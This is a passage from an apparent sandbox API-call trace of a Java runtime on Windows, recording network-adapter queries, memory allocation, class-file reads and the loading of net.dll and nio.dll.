FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x11b0) returned 0x6f [0111.809] realloc (_Block=0x12307740, _Size=0x21b0) returned 0x12307740 [0111.809] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x21b0 | out: AdapterAddresses=0x12307740*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x12307c48, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x21b0) returned 0x0 [0111.813] free (_Block=0x12307740) [0111.813] malloc (_Size=0x1000) returned 0x12307740 [0111.813] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x1000 | out: AdapterAddresses=0x12307740*(Alignment=0x12d79f80, Length=0x12d79f80, IfIndex=0x0, Next=0x122ea420, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x11b0) returned 0x6f [0111.817] realloc (_Block=0x12307740, _Size=0x21b0) returned 0x12307740 [0111.817] GetAdaptersAddresses (in: Family=0x0, Flags=0x1c, Reserved=0x0, AdapterAddresses=0x12307740, SizePointer=0x208c610*=0x21b0 | out: AdapterAddresses=0x12307740*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x12307c48, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x123079a8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x10, [2]=0x63, [3]=0x8b, [4]=0x98, [5]=0xa6, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x12307a58, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x12307900*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x27, [7]=0xf2, [8]=0x0, [9]=0x1b, [10]=0x48, [11]=0xc9, [12]=0x81, [13]=0xd6, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x208c610*=0x21b0) returned 0x0 [0111.820] malloc (_Size=0x1c0) returned 0x12309900 [0111.821] free (_Block=0x12309900) [0111.823] strlen (_Str="java/nio/file/Files.class") returned 0x19 [0111.823] malloc (_Size=0x48) returned 0x12ef2980 [0111.823] malloc (_Size=0xa0) returned 0x12324330 [0111.823] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x332df20, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=53665568) returned 1 [0111.824] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b470*=0xa0, lpOverlapped=0x0) returned 1 [0111.824] malloc (_Size=0x1a) returned 0x12ef0750 [0111.831] strlen (_Str="java/nio/file/Files$AcceptAllFilter.class") returned 0x29 [0111.831] malloc (_Size=0x48) returned 0x12ef28e0 [0111.831] malloc (_Size=0xa0) returned 0x12324b70 [0111.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x332ddba, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=53665210) returned 1 [0111.831] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b580*=0xa0, lpOverlapped=0x0) returned 1 [0111.831] malloc (_Size=0x2a) returned 0x12ef3e10 [0111.856] strlen (_Str="") returned 0x0 [0111.856] strlen (_Str=".dll") returned 0x4 [0111.857] strlen (_Str="") returned 0x0 [0111.857] strlen (_Str=".dll") returned 0x4 [0111.857] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0111.857] malloc (_Size=0x8) returned 0x121a56a0 [0111.857] strlen (_Str="net.dll") returned 0x7 [0111.857] malloc (_Size=0x8) returned 0x121a56c0 [0111.857] strcpy (in: _Dest=0x121a56c0, _Source="net.dll" | out: _Dest="net.dll") returned="net.dll" [0111.857] free (_Block=0x121a56a0) [0111.857] strlen (_Str="net.dll") returned 0x7 [0111.857] strlen (_Str="net") returned 0x3 [0111.857] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0111.857] malloc (_Size=0x12) returned 0x12edc3f0 [0111.857] strncpy (in: _Dest=0x12edc3f0, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0111.857] strcat (in: _Dest=0x12edc3f0, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0111.857] strcat (in: _Dest=0x12edc3f0, _Source="net" | out: _Dest="_JNI_OnLoad_net") returned="_JNI_OnLoad_net" [0111.857] strcat (in: _Dest=0x12edc3f0, _Source="@8" | out: _Dest="_JNI_OnLoad_net@8") returned="_JNI_OnLoad_net@8" [0111.857] free (_Block=0x12edc3f0) [0111.857] strlen (_Str="net") returned 0x3 [0111.857] strlen (_Str="JNI_OnLoad") returned 0xa [0111.858] malloc (_Size=0xf) returned 0x12edc4d0 [0111.858] strcpy (in: _Dest=0x12edc4d0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0111.858] strcat (in: _Dest=0x12edc4d0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0111.858] strcat (in: _Dest=0x12edc4d0, _Source="net" | out: _Dest="JNI_OnLoad_net") returned="JNI_OnLoad_net" [0111.858] free (_Block=0x12edc4d0) [0111.858] free (_Block=0x121a56c0) [0111.858] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned 0x2e [0111.858] malloc (_Size=0x68) returned 0x12ec3620 [0111.858] wcscpy (in: _Dest=0x12ec3620, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" [0111.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll", nBufferLength=0x9, lpBuffer=0x208a1a8, lpFilePart=0x208a1a0 | out: lpBuffer="", lpFilePart=0x208a1a0*=0x0) returned 0x2f [0111.858] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\net.dll"), fInfoLevelId=0x0, lpFileInformation=0x2089f40 | out: lpFileInformation=0x2089f40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32b9b7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32b9b7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32cd37, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x179c8)) returned 1 [0111.859] free (_Block=0x12ec3620) [0111.859] strlen (_Str="") returned 0x0 [0111.859] strlen (_Str=".dll") returned 0x4 [0111.859] strlen (_Str="") returned 0x0 [0111.859] strlen (_Str=".dll") returned 0x4 [0111.859] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0111.859] malloc (_Size=0x8) returned 0x121a55d0 [0111.859] strlen (_Str="nio.dll") returned 0x7 [0111.859] malloc (_Size=0x8) returned 0x121a5570 [0111.859] strcpy (in: _Dest=0x121a5570, _Source="nio.dll" | out: _Dest="nio.dll") returned="nio.dll" [0111.860] free (_Block=0x121a55d0) [0111.860] strlen (_Str="nio.dll") returned 0x7 [0111.860] strlen (_Str="nio") returned 0x3 [0111.860] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0111.860] malloc (_Size=0x12) returned 0x12edc910 [0111.860] strncpy (in: _Dest=0x12edc910, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0111.860] strcat (in: _Dest=0x12edc910, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0111.860] strcat (in: _Dest=0x12edc910, _Source="nio" | out: _Dest="_JNI_OnLoad_nio") returned="_JNI_OnLoad_nio" [0111.860] strcat (in: _Dest=0x12edc910, _Source="@8" | out: _Dest="_JNI_OnLoad_nio@8") returned="_JNI_OnLoad_nio@8" [0111.860] free (_Block=0x12edc910) [0111.860] strlen (_Str="nio") returned 0x3 [0111.860] strlen (_Str="JNI_OnLoad") returned 0xa [0111.860] malloc (_Size=0xf) returned 0x12edc5b0 [0111.860] strcpy (in: _Dest=0x12edc5b0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0111.860] strcat (in: _Dest=0x12edc5b0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0111.860] strcat (in: _Dest=0x12edc5b0, _Source="nio" | out: _Dest="JNI_OnLoad_nio") returned="JNI_OnLoad_nio" [0111.860] free (_Block=0x12edc5b0) [0111.860] free (_Block=0x121a5570) [0111.860] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll") returned 0x2e [0111.860] malloc (_Size=0x68) returned 0x12ec3620 [0111.860] wcscpy (in: _Dest=0x12ec3620, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll" [0111.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll", nBufferLength=0x9, lpBuffer=0x208a1a8, lpFilePart=0x208a1a0 | out: lpBuffer="", lpFilePart=0x208a1a0*=0x0) returned 0x2f [0111.861] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\nio.dll"), fInfoLevelId=0x0, lpFileInformation=0x2089f40 | out: lpFileInformation=0x2089f40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32e0cf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32e0cf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32e0cf, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xefc8)) returned 1 [0111.862] free (_Block=0x12ec3620) [0111.862] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0111.862] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll") returned 0x2e [0111.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll", lpFindFileData=0x208a210 | out: lpFindFileData=0x208a210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32e0cf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32e0cf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32e0cf, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xefc8, dwReserved0=0x0, dwReserved1=0x2207ae0, cFileName="nio.dll", cAlternateFileName="")) returned 0x425fc0 [0111.862] FindClose (in: hFindFile=0x425fc0 | out: hFindFile=0x425fc0) returned 1 [0111.863] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0111.863] wcslen (_String="nio.dll") returned 0x7 [0111.863] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll") returned 0x2e [0111.863] malloc (_Size=0x2f) returned 0x12ef3e10 [0112.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2089db0 | out: lpSystemTimeAsFileTime=0x2089db0*(dwLowDateTime=0x24e25cfc, dwHighDateTime=0x1d80c8a)) [0112.186] GetCurrentProcessId () returned 0x1250 [0112.186] GetCurrentThreadId () returned 0x12e4 [0112.186] GetTickCount () returned 0x151a82f [0112.186] QueryPerformanceCounter (in: lpPerformanceCount=0x2089db8 | out: lpPerformanceCount=0x2089db8*=2222728883257) returned 1 [0112.186] _malloc_crt () returned 0x1225a000 [0112.187] __dllonexit () returned 0x7214a9b28000000 [0112.187] __dllonexit () returned 0x7214a8088000000 [0112.188] DisableThreadLibraryCalls (hLibModule=0x6f470000) returned 1 [0112.188] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0112.188] malloc (_Size=0xf) returned 0x12edc3b0 [0112.188] strcpy (in: _Dest=0x12edc3b0, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0112.188] free (_Block=0x12edc3b0) [0112.188] strlen (_Str="JNI_OnLoad") returned 0xa [0112.188] malloc (_Size=0xc) returned 0x12edc870 [0112.188] strcpy (in: _Dest=0x12edc870, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0112.188] free (_Block=0x12edc870) [0112.189] free (_Block=0x12ef3e10) [0112.191] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$FirstFile.class") returned 0x32 [0112.191] malloc (_Size=0x48) returned 0x12ef2980 [0112.191] malloc (_Size=0xa0) returned 0x12324cd0 [0112.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ccdd6, lpNewFilePointer=0x208b2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2e0*=54316502) returned 1 [0112.191] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2b0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208b2b0*=0xa0, lpOverlapped=0x0) returned 1 [0112.191] malloc (_Size=0x33) returned 0x12ef4450 [0112.192] strlen (_Str="sun/nio/fs/WindowsNativeDispatcher$FirstStream.class") returned 0x34 [0112.193] malloc (_Size=0x48) returned 0x12ef34c0 [0112.193] malloc (_Size=0xa0) returned 0x12324b70 [0112.193] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cce36, 